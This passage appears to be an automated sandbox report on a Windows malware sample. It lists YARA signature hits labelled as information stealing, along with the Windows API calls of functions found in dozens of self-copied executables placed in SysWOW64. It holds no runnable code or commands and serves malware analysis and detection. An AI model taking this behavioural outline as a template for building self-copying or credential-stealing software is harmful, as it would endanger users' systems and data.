                      Source: C:\Users\user\Desktop\h879iieoae.exe | Code function: 0_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA | 0_2_00406C29

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 24.2.Cfnpmb32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Opbieagi.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.Ccapffke.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Cnjaioih.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Bqjacldl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Oceoll32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.Dmfdkj32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Nejhbi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.Qgcpihjl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.Bmlhnnne.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Pqeoao32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.Feidnc32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.Efgkjnfn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Oglabl32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Ojacofgb.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.Bqjacldl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Olijjb32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.Plgflqpn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Cnjaioih.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.Cfnpmb32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Olijjb32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.Efgkjnfn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.Bnnampcf.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.Onkcje32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.h879iieoae.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.Dnhmjm32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Ogjdllpi.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.Emogai32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Ojacofgb.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Oglabl32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Opbieagi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Pqeoao32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Bgamkfnl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.Fkogfkdj.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.Camgpi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.Baagdk32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.Ppllkpoo.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.Bnpnbp32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.Ajkolbad.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.Emogai32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Ogjdllpi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.Fhedeo32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.Dfcboo32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.Plbmqa32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.Dfcboo32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.Eoappk32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.Bnpnbp32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Oceoll32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 16.2.Ajkolbad.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 38.2.Feidnc32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 17.2.Bmlhnnne.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 28.2.Camgpi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 12.2.Plbmqa32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 32.2.Edgbhcim.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 36.2.Fkogfkdj.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 25.2.Ccapffke.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 26.2.Ceampi32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 9.2.Odekfoij.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 22.2.Bgibkegc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 8.2.Onkcje32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 32.2.Edgbhcim.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 1.2.Nejhbi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 22.2.Bgibkegc.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 26.2.Ceampi32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 15.2.Qgcpihjl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 39.2.Foaigifk.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 18.2.Bgamkfnl.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 37.2.Fhedeo32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 6.2.Oeanchcn.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 39.2.Foaigifk.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 35.2.Eoappk32.exe.42aa84.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 11.2.Ppllkpoo.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 6.2.Oeanchcn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 20.2.Bnnampcf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.h879iieoae.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 30.2.Dnhmjm32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 23.2.Baagdk32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 9.2.Odekfoij.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 13.2.Plgflqpn.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 29.2.Dmfdkj32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: Process Memory Space: h879iieoae.exe PID: 6496, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Nejhbi32.exe PID: 6544, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Ogjdllpi.exe PID: 6604, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Opbieagi.exe PID: 6648, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Oglabl32.exe PID: 6692, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Olijjb32.exe PID: 6744, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Oeanchcn.exe PID: 6768, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Oceoll32.exe PID: 6824, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Onkcje32.exe PID: 6860, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Odekfoij.exe PID: 6928, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Ojacofgb.exe PID: 6992, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Ppllkpoo.exe PID: 7064, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Plbmqa32.exe PID: 7092, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Plgflqpn.exe PID: 7084, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Pqeoao32.exe PID: 3808, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Qgcpihjl.exe PID: 2896, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Ajkolbad.exe PID: 4956, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Bmlhnnne.exe PID: 2056, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Bgamkfnl.exe PID: 2924, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Bqjacldl.exe PID: 2256, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Bnnampcf.exe PID: 5640, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Bnpnbp32.exe PID: 6188, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Bgibkegc.exe PID: 1740, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Baagdk32.exe PID: 916, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Cfnpmb32.exe PID: 1188, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Ccapffke.exe PID: 7104, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Ceampi32.exe PID: 6460, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Cnjaioih.exe PID: 4284, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Camgpi32.exe PID: 7180, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Dmfdkj32.exe PID: 7196, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Dnhmjm32.exe PID: 7212, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Dfcboo32.exe PID: 7228, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Edgbhcim.exe PID: 7244, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Emogai32.exe PID: 7260, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Efgkjnfn.exe PID: 7276, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Eoappk32.exe PID: 7292, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Fkogfkdj.exe PID: 7312, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Fhedeo32.exe PID: 7328, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Feidnc32.exe PID: 7344, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: Foaigifk.exe PID: 7368, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\h879iieoae.exe, Code function: 0_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 0_2_00405C09
                      Source: C:\Users\user\Desktop\h879iieoae.exe, Code function: 0_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 0_2_00405133
                      Source: C:\Windows\SysWOW64\Nejhbi32.exe, Code function: 1_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 1_2_00405C09
                      Source: C:\Windows\SysWOW64\Nejhbi32.exe, Code function: 1_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 1_2_00405133
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exe, Code function: 2_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 2_2_00405C09
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exe, Code function: 2_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 2_2_00405133
                      Source: C:\Windows\SysWOW64\Opbieagi.exe, Code function: 3_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 3_2_00405C09
                      Source: C:\Windows\SysWOW64\Opbieagi.exe, Code function: 3_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 3_2_00405133
                      Source: C:\Windows\SysWOW64\Oglabl32.exe, Code function: 4_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 4_2_00405C09
                      Source: C:\Windows\SysWOW64\Oglabl32.exe, Code function: 4_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 4_2_00405133
                      Source: C:\Windows\SysWOW64\Olijjb32.exe, Code function: 5_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 5_2_00405C09
                      Source: C:\Windows\SysWOW64\Olijjb32.exe, Code function: 5_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 5_2_00405133
                      Source: C:\Windows\SysWOW64\Oeanchcn.exe, Code function: 6_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 6_2_00405C09
                      Source: C:\Windows\SysWOW64\Oeanchcn.exe, Code function: 6_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 6_2_00405133
                      Source: C:\Windows\SysWOW64\Oceoll32.exe, Code function: 7_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 7_2_00405C09
                      Source: C:\Windows\SysWOW64\Oceoll32.exe, Code function: 7_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 7_2_00405133
                      Source: C:\Windows\SysWOW64\Onkcje32.exe, Code function: 8_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 8_2_00405C09
                      Source: C:\Windows\SysWOW64\Onkcje32.exe, Code function: 8_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 8_2_00405133
                      Source: C:\Windows\SysWOW64\Odekfoij.exe, Code function: 9_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 9_2_00405C09
                      Source: C:\Windows\SysWOW64\Odekfoij.exe, Code function: 9_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 9_2_00405133
                      Source: C:\Windows\SysWOW64\Ojacofgb.exe, Code function: 10_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 10_2_00405C09
                      Source: C:\Windows\SysWOW64\Ojacofgb.exe, Code function: 10_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 10_2_00405133
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exe, Code function: 11_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 11_2_00405C09
                      Source: C:\Windows\SysWOW64\Ppllkpoo.exe, Code function: 11_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 11_2_00405133
                      Source: C:\Windows\SysWOW64\Plbmqa32.exe, Code function: 12_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 12_2_00405C09
                      Source: C:\Windows\SysWOW64\Plbmqa32.exe, Code function: 12_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 12_2_00405133
                      Source: C:\Windows\SysWOW64\Plgflqpn.exe, Code function: 13_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 13_2_00405C09
                      Source: C:\Windows\SysWOW64\Plgflqpn.exe, Code function: 13_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 13_2_00405133
                      Source: C:\Windows\SysWOW64\Pqeoao32.exe, Code function: 14_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 14_2_00405C09
                      Source: C:\Windows\SysWOW64\Pqeoao32.exe, Code function: 14_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 14_2_00405133
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exe, Code function: 15_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 15_2_00405C09
                      Source: C:\Windows\SysWOW64\Qgcpihjl.exe, Code function: 15_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 15_2_00405133
                      Source: C:\Windows\SysWOW64\Ajkolbad.exe, Code function: 16_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 16_2_00405C09
                      Source: C:\Windows\SysWOW64\Ajkolbad.exe, Code function: 16_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 16_2_00405133
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exe, Code function: 17_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 17_2_00405C09
                      Source: C:\Windows\SysWOW64\Bmlhnnne.exe, Code function: 17_2_00405133 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,InterlockedIncrement,memset,GetTickCount,srand,LocalFree,ExpandEnvironmentStringsA,LocalFree,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,Sleep,GetWindowTextA,DeleteFileA,LocalFree,TerminateProcess,CloseHandle, 17_2_00405133
                      Source: C:\Windows\SysWOW64\Bgamkfnl.exe, Code function: 18_2_00405C09 lstrlenA,GetTickCount,srand,InterlockedIncrement,memset,ExpandEnvironmentStringsA,strcat,strcat,memset,CreateProcessA,CloseHandle,sprintf,FindWindowA,Sleep,Sleep,GetWindowTextA,CopyFileA,DeleteFileA,lstrlenA,strncmp,lstrlenA,LocalFree,DeleteFileA,TerminateProcess,CloseHandle, 18_2_00405C09
